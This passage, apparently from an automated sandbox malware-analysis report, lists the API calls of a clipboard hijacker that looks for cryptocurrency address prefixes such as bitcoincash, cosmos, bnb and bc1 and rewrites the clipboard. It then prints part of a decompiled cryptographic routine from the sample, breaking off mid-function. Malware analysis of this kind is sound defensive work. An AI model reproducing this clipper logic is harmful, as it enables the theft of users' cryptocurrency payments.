                                                                                                                                                                                                                                                                  0x00403b76
                                                                                                                                                                                                                                                                  0x00403b82
                                                                                                                                                                                                                                                                  0x00403b92
                                                                                                                                                                                                                                                                  0x00403b94
                                                                                                                                                                                                                                                                  0x00403ba0
                                                                                                                                                                                                                                                                  0x00403ba6
                                                                                                                                                                                                                                                                  0x00403ba6
                                                                                                                                                                                                                                                                  0x00403b92
                                                                                                                                                                                                                                                                  0x00403b65
                                                                                                                                                                                                                                                                  0x00403b52
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00403bac
                                                                                                                                                                                                                                                                  0x0040376d
                                                                                                                                                                                                                                                                  0x0040377f
                                                                                                                                                                                                                                                                  0x00403790
                                                                                                                                                                                                                                                                  0x004037cc
                                                                                                                                                                                                                                                                  0x004037d0
                                                                                                                                                                                                                                                                  0x004037d1
                                                                                                                                                                                                                                                                  0x004037d6
                                                                                                                                                                                                                                                                  0x004037db
                                                                                                                                                                                                                                                                  0x004037fb
                                                                                                                                                                                                                                                                  0x0040377c
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040377c
                                                                                                                                                                                                                                                                  0x004037e3
                                                                                                                                                                                                                                                                  0x004037e7
                                                                                                                                                                                                                                                                  0x004037e8
                                                                                                                                                                                                                                                                  0x004037ed
                                                                                                                                                                                                                                                                  0x004037f2
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x004037bf
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x004037bf
                                                                                                                                                                                                                                                                  0x00403790
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040377f

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(00000000), ref: 00403498
                                                                                                                                                                                                                                                                  • StrStrW.SHLWAPI(00000000,bitcoincash:), ref: 004036A1
                                                                                                                                                                                                                                                                  • StrStrW.SHLWAPI(00000000,cosmos), ref: 004036CC
                                                                                                                                                                                                                                                                  • StrStrW.SHLWAPI(00000000,addr), ref: 004036F4
                                                                                                                                                                                                                                                                  • StrStrW.SHLWAPI(00000000,bitcoincash:), ref: 0040375F
                                                                                                                                                                                                                                                                  • isalpha.NTDLL ref: 004037D1
                                                                                                                                                                                                                                                                  • isdigit.NTDLL ref: 004037E8
                                                                                                                                                                                                                                                                  • StrStrW.SHLWAPI(00000000,bitcoincash), ref: 004039DD
                                                                                                                                                                                                                                                                  • StrStrW.SHLWAPI(00000000,cosmos), ref: 004039F7
                                                                                                                                                                                                                                                                  • StrStrW.SHLWAPI(00000000,addr), ref: 00403A35
                                                                                                                                                                                                                                                                  • StrStrW.SHLWAPI(00000000,bnb), ref: 00403AAB
                                                                                                                                                                                                                                                                  • StrStrW.SHLWAPI(00000000,band), ref: 00403AC5
                                                                                                                                                                                                                                                                  • StrStrW.SHLWAPI(00000000,bc1), ref: 00403ADF
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 00403B2A
                                                                                                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00002002,-00000001), ref: 00403B45
                                                                                                                                                                                                                                                                  • GlobalLock.KERNEL32 ref: 00403B58
                                                                                                                                                                                                                                                                  • memcpy.NTDLL(00000000,00000000,-00000001), ref: 00403B76
                                                                                                                                                                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00403B82
                                                                                                                                                                                                                                                                  • OpenClipboard.USER32(00000000), ref: 00403B8A
                                                                                                                                                                                                                                                                  • EmptyClipboard.USER32 ref: 00403B94
                                                                                                                                                                                                                                                                  • SetClipboardData.USER32 ref: 00403BA0
                                                                                                                                                                                                                                                                  • CloseClipboard.USER32 ref: 00403BA6
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.263050024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263037424.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263087804.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263093386.0000000000412000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_l3Qj8QhTYZ.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Clipboard$Global$lstrlen$AllocCloseDataEmptyLockOpenUnlockisalphaisdigitmemcpy
                                                                                                                                                                                                                                                                  • String ID: 8$addr$addr$band$bc1$bitcoincash$bitcoincash:$bitcoincash:$bnb$cosmos$cosmos$A
                                                                                                                                                                                                                                                                  • API String ID: 2780752356-300882561
                                                                                                                                                                                                                                                                  • Opcode ID: 8c46d69e59928b6bfcdccf5f037a440ae4229138678e98fc44ef196ca473b62a
                                                                                                                                                                                                                                                                  • Instruction ID: 8f56d688a8274e8fde1ca81afa5bad9f76d0da7fa194d78e50a701bd16c4cec2
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8c46d69e59928b6bfcdccf5f037a440ae4229138678e98fc44ef196ca473b62a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 12223B70A00208EBCB64CF41C1944BE7FBAAF42756F60C46AE8456F390D7799ED1DB98
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                                                                                  			E00406359() {
                                                                                                                                                                                                                                                                  				signed int _t1392;
                                                                                                                                                                                                                                                                  				signed int _t1393;
                                                                                                                                                                                                                                                                  				signed int _t1394;
                                                                                                                                                                                                                                                                  				signed int _t1398;
                                                                                                                                                                                                                                                                  				signed int _t1408;
                                                                                                                                                                                                                                                                  				intOrPtr _t1409;
                                                                                                                                                                                                                                                                  				signed int _t1419;
                                                                                                                                                                                                                                                                  				intOrPtr _t1420;
                                                                                                                                                                                                                                                                  				signed int _t1430;
                                                                                                                                                                                                                                                                  				intOrPtr _t1431;
                                                                                                                                                                                                                                                                  				signed int _t1441;
                                                                                                                                                                                                                                                                  				intOrPtr _t1442;
                                                                                                                                                                                                                                                                  				signed int _t1452;
                                                                                                                                                                                                                                                                  				intOrPtr _t1453;
                                                                                                                                                                                                                                                                  				signed int _t1463;
                                                                                                                                                                                                                                                                  				intOrPtr _t1464;
                                                                                                                                                                                                                                                                  				signed int _t1474;
                                                                                                                                                                                                                                                                  				intOrPtr _t1475;
                                                                                                                                                                                                                                                                  				signed int _t1485;
                                                                                                                                                                                                                                                                  				intOrPtr _t1486;
                                                                                                                                                                                                                                                                  				signed int _t1496;
                                                                                                                                                                                                                                                                  				intOrPtr _t1497;
                                                                                                                                                                                                                                                                  				signed int _t1507;
                                                                                                                                                                                                                                                                  				intOrPtr _t1508;
                                                                                                                                                                                                                                                                  				signed int _t1518;
                                                                                                                                                                                                                                                                  				intOrPtr _t1519;
                                                                                                                                                                                                                                                                  				signed int _t1529;
                                                                                                                                                                                                                                                                  				intOrPtr _t1530;
                                                                                                                                                                                                                                                                  				signed int _t1540;
                                                                                                                                                                                                                                                                  				intOrPtr _t1541;
                                                                                                                                                                                                                                                                  				signed int _t1551;
                                                                                                                                                                                                                                                                  				intOrPtr _t1552;
                                                                                                                                                                                                                                                                  				signed int _t1562;
                                                                                                                                                                                                                                                                  				intOrPtr _t1563;
                                                                                                                                                                                                                                                                  				intOrPtr _t1572;
                                                                                                                                                                                                                                                                  				intOrPtr _t1573;
                                                                                                                                                                                                                                                                  				intOrPtr _t1574;
                                                                                                                                                                                                                                                                  				signed int _t1575;
                                                                                                                                                                                                                                                                  				signed int _t1581;
                                                                                                                                                                                                                                                                  				signed int _t1582;
                                                                                                                                                                                                                                                                  				signed int _t1583;
                                                                                                                                                                                                                                                                  				signed int _t1584;
                                                                                                                                                                                                                                                                  				signed int _t1588;
                                                                                                                                                                                                                                                                  				signed int _t1591;
                                                                                                                                                                                                                                                                  				signed int _t1592;
                                                                                                                                                                                                                                                                  				signed int _t1593;
                                                                                                                                                                                                                                                                  				signed int _t1594;
                                                                                                                                                                                                                                                                  				signed int _t1598;
                                                                                                                                                                                                                                                                  				signed int _t1601;
                                                                                                                                                                                                                                                                  				signed int _t1602;
                                                                                                                                                                                                                                                                  				signed int _t1603;
                                                                                                                                                                                                                                                                  				signed int _t1604;
                                                                                                                                                                                                                                                                  				signed int _t1608;
                                                                                                                                                                                                                                                                  				signed int _t1611;
                                                                                                                                                                                                                                                                  				signed int _t1612;
                                                                                                                                                                                                                                                                  				signed int _t1613;
                                                                                                                                                                                                                                                                  				signed int _t1614;
                                                                                                                                                                                                                                                                  				signed int _t1618;
                                                                                                                                                                                                                                                                  				signed int _t1621;
                                                                                                                                                                                                                                                                  				signed int _t1622;
                                                                                                                                                                                                                                                                  				signed int _t1623;
                                                                                                                                                                                                                                                                  				signed int _t1624;
                                                                                                                                                                                                                                                                  				signed int _t1628;
                                                                                                                                                                                                                                                                  				signed int _t1631;
                                                                                                                                                                                                                                                                  				signed int _t1632;
                                                                                                                                                                                                                                                                  				signed int _t1633;
                                                                                                                                                                                                                                                                  				signed int _t1634;
                                                                                                                                                                                                                                                                  				signed int _t1638;
                                                                                                                                                                                                                                                                  				signed int _t1641;
                                                                                                                                                                                                                                                                  				signed int _t1642;
                                                                                                                                                                                                                                                                  				signed int _t1643;
                                                                                                                                                                                                                                                                  				signed int _t1644;
                                                                                                                                                                                                                                                                  				signed int _t1648;
                                                                                                                                                                                                                                                                  				signed int _t1651;
                                                                                                                                                                                                                                                                  				signed int _t1652;
                                                                                                                                                                                                                                                                  				signed int _t1653;
                                                                                                                                                                                                                                                                  				signed int _t1654;
                                                                                                                                                                                                                                                                  				signed int _t1658;
                                                                                                                                                                                                                                                                  				signed int _t1661;
                                                                                                                                                                                                                                                                  				signed int _t1662;
                                                                                                                                                                                                                                                                  				signed int _t1663;
                                                                                                                                                                                                                                                                  				signed int _t1664;
                                                                                                                                                                                                                                                                  				signed int _t1668;
                                                                                                                                                                                                                                                                  				signed int _t1671;
                                                                                                                                                                                                                                                                  				signed int _t1672;
                                                                                                                                                                                                                                                                  				signed int _t1673;
                                                                                                                                                                                                                                                                  				signed int _t1674;
                                                                                                                                                                                                                                                                  				signed int _t1678;
                                                                                                                                                                                                                                                                  				signed int _t1681;
                                                                                                                                                                                                                                                                  				signed int _t1682;
                                                                                                                                                                                                                                                                  				signed int _t1683;
                                                                                                                                                                                                                                                                  				signed int _t1684;
                                                                                                                                                                                                                                                                  				signed int _t1688;
                                                                                                                                                                                                                                                                  				signed int _t1691;
                                                                                                                                                                                                                                                                  				signed int _t1692;
                                                                                                                                                                                                                                                                  				signed int _t1693;
                                                                                                                                                                                                                                                                  				signed int _t1694;
                                                                                                                                                                                                                                                                  				signed int _t1698;
                                                                                                                                                                                                                                                                  				signed int _t1701;
                                                                                                                                                                                                                                                                  				signed int _t1702;
                                                                                                                                                                                                                                                                  				signed int _t1703;
                                                                                                                                                                                                                                                                  				signed int _t1704;
                                                                                                                                                                                                                                                                  				signed int _t1708;
                                                                                                                                                                                                                                                                  				signed int _t1711;
                                                                                                                                                                                                                                                                  				signed int _t1712;
                                                                                                                                                                                                                                                                  				signed int _t1713;
                                                                                                                                                                                                                                                                  				signed int _t1714;
                                                                                                                                                                                                                                                                  				signed int _t1718;
                                                                                                                                                                                                                                                                  				signed int _t1721;
                                                                                                                                                                                                                                                                  				signed int _t1722;
                                                                                                                                                                                                                                                                  				signed int _t1723;
                                                                                                                                                                                                                                                                  				signed int _t1724;
                                                                                                                                                                                                                                                                  				signed int _t1728;
                                                                                                                                                                                                                                                                  				signed int _t1731;
                                                                                                                                                                                                                                                                  				signed int _t1743;
                                                                                                                                                                                                                                                                  				intOrPtr _t1744;
                                                                                                                                                                                                                                                                  				intOrPtr _t1750;
                                                                                                                                                                                                                                                                  				intOrPtr _t1751;
                                                                                                                                                                                                                                                                  				intOrPtr _t1752;
                                                                                                                                                                                                                                                                  				signed int _t1753;
                                                                                                                                                                                                                                                                  				intOrPtr _t1762;
                                                                                                                                                                                                                                                                  				intOrPtr _t1763;
                                                                                                                                                                                                                                                                  				intOrPtr _t1764;
                                                                                                                                                                                                                                                                  				signed int _t1765;
                                                                                                                                                                                                                                                                  				intOrPtr _t1774;
                                                                                                                                                                                                                                                                  				intOrPtr _t1775;
                                                                                                                                                                                                                                                                  				intOrPtr _t1776;
                                                                                                                                                                                                                                                                  				signed int _t1777;
                                                                                                                                                                                                                                                                  				intOrPtr _t1786;
                                                                                                                                                                                                                                                                  				intOrPtr _t1787;
                                                                                                                                                                                                                                                                  				intOrPtr _t1788;
                                                                                                                                                                                                                                                                  				signed int _t1789;
                                                                                                                                                                                                                                                                  				intOrPtr _t1798;
                                                                                                                                                                                                                                                                  				intOrPtr _t1799;
                                                                                                                                                                                                                                                                  				intOrPtr _t1800;
                                                                                                                                                                                                                                                                  				signed int _t1801;
                                                                                                                                                                                                                                                                  				intOrPtr _t1810;
                                                                                                                                                                                                                                                                  				intOrPtr _t1811;
                                                                                                                                                                                                                                                                  				intOrPtr _t1812;
                                                                                                                                                                                                                                                                  				signed int _t1813;
                                                                                                                                                                                                                                                                  				intOrPtr _t1822;
                                                                                                                                                                                                                                                                  				intOrPtr _t1823;
                                                                                                                                                                                                                                                                  				intOrPtr _t1824;
                                                                                                                                                                                                                                                                  				signed int _t1825;
                                                                                                                                                                                                                                                                  				intOrPtr _t1834;
                                                                                                                                                                                                                                                                  				intOrPtr _t1835;
                                                                                                                                                                                                                                                                  				intOrPtr _t1836;
                                                                                                                                                                                                                                                                  				signed int _t1837;
                                                                                                                                                                                                                                                                  				intOrPtr _t1846;
                                                                                                                                                                                                                                                                  				intOrPtr _t1847;
                                                                                                                                                                                                                                                                  				intOrPtr _t1848;
                                                                                                                                                                                                                                                                  				signed int _t1849;
                                                                                                                                                                                                                                                                  				intOrPtr _t1858;
                                                                                                                                                                                                                                                                  				intOrPtr _t1859;
                                                                                                                                                                                                                                                                  				intOrPtr _t1860;
                                                                                                                                                                                                                                                                  				signed int _t1861;
                                                                                                                                                                                                                                                                  				intOrPtr _t1870;
                                                                                                                                                                                                                                                                  				intOrPtr _t1871;
                                                                                                                                                                                                                                                                  				intOrPtr _t1872;
                                                                                                                                                                                                                                                                  				signed int _t1873;
                                                                                                                                                                                                                                                                  				intOrPtr _t1882;
                                                                                                                                                                                                                                                                  				intOrPtr _t1883;
                                                                                                                                                                                                                                                                  				intOrPtr _t1884;
                                                                                                                                                                                                                                                                  				signed int _t1885;
                                                                                                                                                                                                                                                                  				intOrPtr _t1894;
                                                                                                                                                                                                                                                                  				intOrPtr _t1895;
                                                                                                                                                                                                                                                                  				intOrPtr _t1896;
                                                                                                                                                                                                                                                                  				signed int _t1897;
                                                                                                                                                                                                                                                                  				intOrPtr _t1906;
                                                                                                                                                                                                                                                                  				intOrPtr _t1907;
                                                                                                                                                                                                                                                                  				intOrPtr _t1908;
                                                                                                                                                                                                                                                                  				signed int _t1909;
                                                                                                                                                                                                                                                                  				intOrPtr _t1918;
                                                                                                                                                                                                                                                                  				intOrPtr _t1919;
                                                                                                                                                                                                                                                                  				intOrPtr _t1920;
                                                                                                                                                                                                                                                                  				signed int _t1921;
                                                                                                                                                                                                                                                                  				intOrPtr _t2038;
                                                                                                                                                                                                                                                                  				intOrPtr _t2039;
                                                                                                                                                                                                                                                                  				intOrPtr _t2040;
                                                                                                                                                                                                                                                                  				intOrPtr _t2045;
                                                                                                                                                                                                                                                                  				intOrPtr _t2046;
                                                                                                                                                                                                                                                                  				intOrPtr _t2047;
                                                                                                                                                                                                                                                                  				intOrPtr _t2052;
                                                                                                                                                                                                                                                                  				intOrPtr _t2053;
                                                                                                                                                                                                                                                                  				intOrPtr _t2054;
                                                                                                                                                                                                                                                                  				intOrPtr _t2059;
                                                                                                                                                                                                                                                                  				intOrPtr _t2060;
                                                                                                                                                                                                                                                                  				intOrPtr _t2061;
                                                                                                                                                                                                                                                                  				intOrPtr _t2066;
                                                                                                                                                                                                                                                                  				intOrPtr _t2067;
                                                                                                                                                                                                                                                                  				intOrPtr _t2068;
                                                                                                                                                                                                                                                                  				intOrPtr _t2073;
                                                                                                                                                                                                                                                                  				intOrPtr _t2074;
                                                                                                                                                                                                                                                                  				intOrPtr _t2075;
                                                                                                                                                                                                                                                                  				intOrPtr _t2080;
                                                                                                                                                                                                                                                                  				intOrPtr _t2081;
                                                                                                                                                                                                                                                                  				intOrPtr _t2082;
                                                                                                                                                                                                                                                                  				intOrPtr _t2087;
                                                                                                                                                                                                                                                                  				intOrPtr _t2088;
                                                                                                                                                                                                                                                                  				intOrPtr _t2089;
                                                                                                                                                                                                                                                                  				intOrPtr _t2094;
                                                                                                                                                                                                                                                                  				intOrPtr _t2095;
                                                                                                                                                                                                                                                                  				intOrPtr _t2096;
                                                                                                                                                                                                                                                                  				intOrPtr _t2101;
                                                                                                                                                                                                                                                                  				intOrPtr _t2102;
                                                                                                                                                                                                                                                                  				intOrPtr _t2103;
                                                                                                                                                                                                                                                                  				intOrPtr _t2108;
                                                                                                                                                                                                                                                                  				intOrPtr _t2109;
                                                                                                                                                                                                                                                                  				intOrPtr _t2110;
                                                                                                                                                                                                                                                                  				intOrPtr _t2115;
                                                                                                                                                                                                                                                                  				intOrPtr _t2116;
                                                                                                                                                                                                                                                                  				intOrPtr _t2117;
                                                                                                                                                                                                                                                                  				intOrPtr _t2122;
                                                                                                                                                                                                                                                                  				intOrPtr _t2123;
                                                                                                                                                                                                                                                                  				intOrPtr _t2124;
                                                                                                                                                                                                                                                                  				intOrPtr _t2129;
                                                                                                                                                                                                                                                                  				intOrPtr _t2130;
                                                                                                                                                                                                                                                                  				intOrPtr _t2131;
                                                                                                                                                                                                                                                                  				intOrPtr _t2136;
                                                                                                                                                                                                                                                                  				intOrPtr _t2137;
                                                                                                                                                                                                                                                                  				intOrPtr _t2138;
                                                                                                                                                                                                                                                                  				intOrPtr _t2143;
                                                                                                                                                                                                                                                                  				intOrPtr _t2144;
                                                                                                                                                                                                                                                                  				intOrPtr _t2145;
                                                                                                                                                                                                                                                                  				void* _t2149;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				L0:
                                                                                                                                                                                                                                                                  				while(1) {
                                                                                                                                                                                                                                                                  					L0:
                                                                                                                                                                                                                                                                  					 *((intOrPtr*)(_t2149 - 0x1c)) =  *((intOrPtr*)(_t2149 - 0x1c)) + 0x10;
                                                                                                                                                                                                                                                                  					L1:
                                                                                                                                                                                                                                                                  					_t1391 =  *(_t2149 + 0xc) << 4;
                                                                                                                                                                                                                                                                  					if( *((intOrPtr*)(_t2149 - 0x1c)) < _t1391) {
                                                                                                                                                                                                                                                                  						L2:
                                                                                                                                                                                                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 0x18);
                                                                                                                                                                                                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 0x14);
                                                                                                                                                                                                                                                                  						_t1392 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                  						_t1572 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t1572 + _t1392 * 8 - 0x2c8);
                                                                                                                                                                                                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t1572 + _t1392 * 8 - 0x2c4);
                                                                                                                                                                                                                                                                  						_t1393 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                  						_t1573 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t1573 + _t1393 * 8 - 0x88);
                                                                                                                                                                                                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t1573 + _t1393 * 8 - 0x84);
                                                                                                                                                                                                                                                                  						_t1394 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                  						_t1574 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                  						_t1743 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                  						_t2038 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                  						 *(_t2149 - 8) =  *(_t1574 + _t1394 * 8 - 0x90) &  *(_t2038 + _t1743 * 8 - 0xa8) ^  *(_t2149 - 8);
                                                                                                                                                                                                                                                                  						 *(_t2149 - 4) =  *(_t1574 + _t1394 * 8 - 0x8c) &  *(_t2038 + _t1743 * 8 - 0xa4) ^  *(_t2149 - 4);
                                                                                                                                                                                                                                                                  						_t1575 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                  						_t1744 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                  						_t1398 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                  						_t2039 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                  						 *(_t2149 - 8) =  *(_t1744 + _t1575 * 8 - 0xf8) &  *(_t2039 + _t1398 * 8 - 0x218) ^  *(_t2149 - 8);
                                                                                                                                                                                                                                                                  						 *(_t2149 - 4) =  *(_t1744 + _t1575 * 8 - 0xf4) &  *(_t2039 + _t1398 * 8 - 0x214) ^  *(_t2149 - 4);
                                                                                                                                                                                                                                                                  						L0040EB18();
                                                                                                                                                                                                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t2149 - 8);
                                                                                                                                                                                                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t2149 - 4);
                                                                                                                                                                                                                                                                  						L0040EB1E();
                                                                                                                                                                                                                                                                  						_t1581 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                  						_t2040 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                  						 *(_t2040 + _t1581 * 8) =  *(_t2149 - 8) ^  *(_t2149 - 8);
                                                                                                                                                                                                                                                                  						 *(_t2040 + 4 + _t1581 * 8) =  *(_t2149 - 4) ^  *(_t2149 - 4);
                                                                                                                                                                                                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 0x18);
                                                                                                                                                                                                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 0x14);
                                                                                                                                                                                                                                                                  						_t1582 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                  						_t1750 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t1750 + _t1582 * 8 - 0x2c0);
                                                                                                                                                                                                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t1750 + _t1582 * 8 - 0x2bc);
                                                                                                                                                                                                                                                                  						_t1583 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                  						_t1751 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t1751 + _t1583 * 8 - 0x80);
                                                                                                                                                                                                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t1751 + _t1583 * 8 - 0x7c);
                                                                                                                                                                                                                                                                  						_t1584 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                  						_t1752 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                  						_t1408 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                  						_t2045 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                  						 *(_t2149 - 8) =  *(_t1752 + _t1584 * 8 - 0x88) &  *(_t2045 + _t1408 * 8 - 0xa0) ^  *(_t2149 - 8);
                                                                                                                                                                                                                                                                  						 *(_t2149 - 4) =  *(_t1752 + _t1584 * 8 - 0x84) &  *(_t2045 + _t1408 * 8 - 0x9c) ^  *(_t2149 - 4);
                                                                                                                                                                                                                                                                  						_t1753 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                  						_t1409 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                  						_t1588 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                  						_t2046 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                  						 *(_t2149 - 8) =  *(_t1409 + _t1753 * 8 - 0xf0) &  *(_t2046 + _t1588 * 8 - 0x210) ^  *(_t2149 - 8);
                                                                                                                                                                                                                                                                  						 *(_t2149 - 4) =  *(_t1409 + _t1753 * 8 - 0xec) &  *(_t2046 + _t1588 * 8 - 0x20c) ^  *(_t2149 - 4);
                                                                                                                                                                                                                                                                  						L0040EB18();
                                                                                                                                                                                                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t2149 - 8);
                                                                                                                                                                                                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t2149 - 4);
                                                                                                                                                                                                                                                                  						L0040EB1E();
                                                                                                                                                                                                                                                                  						_t1591 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                  						_t2047 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                  						 *(_t2047 + 8 + _t1591 * 8) =  *(_t2149 - 8) ^  *(_t2149 - 8);
                                                                                                                                                                                                                                                                  						 *(_t2047 + 0xc + _t1591 * 8) =  *(_t2149 - 4) ^  *(_t2149 - 4);
                                                                                                                                                                                                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 0x18);
                                                                                                                                                                                                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 0x14);
                                                                                                                                                                                                                                                                  						_t1592 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                  						_t1762 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t1762 + _t1592 * 8 - 0x2b8);
                                                                                                                                                                                                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t1762 + _t1592 * 8 - 0x2b4);
                                                                                                                                                                                                                                                                  						_t1593 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                  						_t1763 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t1763 + _t1593 * 8 - 0x78);
                                                                                                                                                                                                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t1763 + _t1593 * 8 - 0x74);
                                                                                                                                                                                                                                                                  						_t1594 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                  						_t1764 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                  						_t1419 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                  						_t2052 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                  						 *(_t2149 - 8) =  *(_t1764 + _t1594 * 8 - 0x80) &  *(_t2052 + _t1419 * 8 - 0x98) ^  *(_t2149 - 8);
                                                                                                                                                                                                                                                                  						 *(_t2149 - 4) =  *(_t1764 + _t1594 * 8 - 0x7c) &  *(_t2052 + _t1419 * 8 - 0x94) ^  *(_t2149 - 4);
                                                                                                                                                                                                                                                                  						_t1765 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                  						_t1420 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                  						_t1598 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                  						_t2053 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                  						 *(_t2149 - 8) =  *(_t1420 + _t1765 * 8 - 0xe8) &  *(_t2053 + _t1598 * 8 - 0x208) ^  *(_t2149 - 8);
                                                                                                                                                                                                                                                                  						 *(_t2149 - 4) =  *(_t1420 + _t1765 * 8 - 0xe4) &  *(_t2053 + _t1598 * 8 - 0x204) ^  *(_t2149 - 4);
                                                                                                                                                                                                                                                                  						L0040EB18();
                                                                                                                                                                                                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t2149 - 8);
                                                                                                                                                                                                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t2149 - 4);
                                                                                                                                                                                                                                                                  						L0040EB1E();
                                                                                                                                                                                                                                                                  						_t1601 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                  						_t2054 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                  						 *(_t2054 + 0x10 + _t1601 * 8) =  *(_t2149 - 8) ^  *(_t2149 - 8);
                                                                                                                                                                                                                                                                  						 *(_t2054 + 0x14 + _t1601 * 8) =  *(_t2149 - 4) ^  *(_t2149 - 4);
                                                                                                                                                                                                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 0x18);
                                                                                                                                                                                                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 0x14);
                                                                                                                                                                                                                                                                  						_t1602 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                  						_t1774 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t1774 + _t1602 * 8 - 0x2b0);
